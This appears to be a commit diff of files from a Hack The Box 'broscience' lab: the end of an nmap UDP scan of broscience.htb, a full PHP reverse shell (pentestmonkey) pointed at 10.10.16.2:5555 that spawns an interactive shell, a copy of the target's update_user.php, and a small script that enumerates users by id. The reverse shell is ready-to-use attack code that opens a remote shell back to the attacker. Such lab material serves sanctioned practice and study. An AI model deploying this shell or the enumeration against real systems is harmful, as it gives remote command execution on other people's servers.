<port protocol="udp" portid="1718"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="h225gatedisc" method="table" conf="3"/></port>
<port protocol="udp" portid="1719"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="h323gatestat" method="table" conf="3"/></port>
<port protocol="udp" portid="1812"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="radius" method="table" conf="3"/></port>
<port protocol="udp" portid="1813"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="radacct" method="table" conf="3"/></port>
<port protocol="udp" portid="1900"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="upnp" method="table" conf="3"/></port>
<port protocol="udp" portid="2000"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="cisco-sccp" method="table" conf="3"/></port>
<port protocol="udp" portid="2048"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="dls-monitor" method="table" conf="3"/></port>
<port protocol="udp" portid="2049"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="nfs" method="table" conf="3"/></port>
<port protocol="udp" portid="2222"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="msantipiracy" method="table" conf="3"/></port>
<port protocol="udp" portid="2223"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="rockwell-csp2" method="table" conf="3"/></port>
<port protocol="udp" portid="3283"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="netassistant" method="table" conf="3"/></port>
<port protocol="udp" portid="3456"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="IISrpc-or-vat" method="table" conf="3"/></port>
<port protocol="udp" portid="3703"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="adobeserver-3" method="table" conf="3"/></port>
<port protocol="udp" portid="4444"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="krb524" method="table" conf="3"/></port>
<port protocol="udp" portid="4500"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="nat-t-ike" method="table" conf="3"/></port>
<port protocol="udp" portid="5000"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="upnp" method="table" conf="3"/></port>
<port protocol="udp" portid="5060"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="sip" method="table" conf="3"/></port>
<port protocol="udp" portid="5353"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="zeroconf" method="table" conf="3"/></port>
<port protocol="udp" portid="5632"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="pcanywherestat" method="table" conf="3"/></port>
<port protocol="udp" portid="9200"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="wap-wsp" method="table" conf="3"/></port>
<port protocol="udp" portid="10000"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="ndmp" method="table" conf="3"/></port>
<port protocol="udp" portid="17185"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="wdbrpc" method="table" conf="3"/></port>
<port protocol="udp" portid="20031"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="bakbonenetvault" method="table" conf="3"/></port>
<port protocol="udp" portid="30718"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="31337"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="BackOrifice" method="table" conf="3"/></port>
<port protocol="udp" portid="32768"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="omad" method="table" conf="3"/></port>
<port protocol="udp" portid="32769"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="filenet-rpc" method="table" conf="3"/></port>
<port protocol="udp" portid="32771"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="sometimes-rpc6" method="table" conf="3"/></port>
<port protocol="udp" portid="32815"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="33281"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49152"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49153"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49154"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49156"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49181"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49182"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49185"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49186"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49188"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49190"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49191"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49192"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49193"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49194"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49200"><state state="open|filtered" reason="no-response" reason_ttl="0"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="49201"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
<port protocol="udp" portid="65024"><state state="closed" reason="port-unreach" reason_ttl="63"/><service name="unknown" method="table" conf="3"/></port>
</ports>
<os><portused state="closed" proto="udp" portid="9"/>
<osfingerprint fingerprint="SCAN(V=7.93%E=4%D=2/1%OT=%CT=%CU=9%PV=Y%DS=2%DC=T%G=N%TM=63DA9948%P=x86_64-pc-linux-gnu)&#xa;SEQ(CI=Z%II=I)&#xa;SEQ(CI=Z)&#xa;T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)&#xa;T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)&#xa;U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)&#xa;IE(R=Y%DFI=N%T=40%CD=S)&#xa;"/>
</os>
<distance value="2"/>
<trace port="162" proto="udp">
<hop ttl="1" ipaddr="10.10.16.1" rtt="31.00"/>
<hop ttl="2" ipaddr="10.10.11.195" rtt="328.64" host="broscience.htb"/>
</trace>
<times srtt="86924" rttvar="98466" to="480788"/>
</host>
<taskbegin task="NSE" time="1675270472"/>
<taskend task="NSE" time="1675270472"/>
<taskbegin task="NSE" time="1675270472"/>
<taskend task="NSE" time="1675270472"/>
<taskbegin task="NSE" time="1675270472"/>
<taskend task="NSE" time="1675270472"/>
<runstats><finished time="1675270472" timestr="Wed Feb 1 17:54:32 2023" summary="Nmap done at Wed Feb 1 17:54:32 2023; 1 IP address (1 host up) scanned in 293.59 seconds" elapsed="293.59" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

116
HTB/broscience/shell.php Normal file
View File

@@ -0,0 +1,116 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.16.2';
$port = 5555;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

84
HTB/broscience/update_user.php Normal file
View File

@@ -0,0 +1,84 @@
<?php
session_start();
// Check if user is not logged in
if (!isset($_SESSION['id'])) {
header('Location: /login.php');
echo "Not logged in";
die();
}
// Check that all parameters are filled out
if (!isset($_POST['id']) || !isset($_POST['username']) || !isset($_POST['email']) || !isset($_POST['password'])) {
header('Location: /index.php');
echo "Missing parameters";
die();
}
// Check that parameters are not empty
if (empty($_POST['id'])) {
header('Location: /index.php');
echo "Empty parameters";
die();
}
// Check that we have permissions
include_once 'includes/db_connect.php';
$res = pg_prepare($db_conn, "is_admin_query", 'SELECT is_admin::int FROM users WHERE id = $1');
$res = pg_execute($db_conn, "is_admin_query", array($_SESSION['id']));
$row = pg_fetch_row($res);
$_SESSION['is_admin'] = $row[0]; // Update value since we can
if ($_SESSION['id'] !== $_POST['id'] && !(bool)$row[0]) {
header("Location: /user.php?id={$_POST['id']}");
echo "Missing permissions";
die();
}
// Update the user
if (!empty($_POST['username'])) {
if (strlen($_POST['username']) <= 100) {
// Ensure username is unique
$res = pg_prepare($db_conn, "check_username_query", 'SELECT id FROM users WHERE username = $1');
$res = pg_execute($db_conn, "check_username_query", array($_POST['username']));
if (pg_num_rows($res) == 0) {
$res = pg_prepare($db_conn, "update_user_username_query", 'UPDATE users SET username = $1 WHERE id = $2');
$res = pg_execute($db_conn, "update_user_username_query", array($_POST['username'], $_POST['id']));
// Update session username if we are logged in as this user
if ($_SESSION['id'] === $_POST['id']) {
$_SESSION['username'] = $_POST['username'];
}
} else {
echo "Skipping username which already exists\n";
}
} else {
echo "Skipped invalid username\n";
}
}
if (!empty($_POST['email'])) {
if (filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
// Ensure email is unique
$res = pg_prepare($db_conn, "check_email_query", 'SELECT id FROM users WHERE email = $1');
$res = pg_execute($db_conn, "check_email_query", array($_POST['email']));
if (pg_num_rows($res) == 0) {
$res = pg_prepare($db_conn, "update_user_email_query", 'UPDATE users SET email = $1 WHERE id = $2');
$res = pg_execute($db_conn, "update_user_email_query", array($_POST['email'], $_POST['id']));
} else {
echo "Skipping email which already exists\n";
}
} else {
echo "Skipped invalid email\n";
}
}
if (!empty($_POST['password'])) {
$res = pg_prepare($db_conn, "update_user_password_query", 'UPDATE users SET password = $1 WHERE id = $2');
$res = pg_execute($db_conn, "update_user_password_query", array(md5($db_salt . $_POST['password']), $_POST['id']));
}
header("Location: /user.php?id={$_POST['id']}");
echo "User updated";
?>

8
HTB/broscience/user_collector.py Normal file
View File

@@ -0,0 +1,8 @@
import requests
def getUser(id):
r = requests.get(f"https://broscience.htb/user.php?id={id}", verify=False)
return r
if __name__ == '__main__':
getUser(1)

BIN
HTB/broscience/write.ul Normal file
View File

Binary file not shown.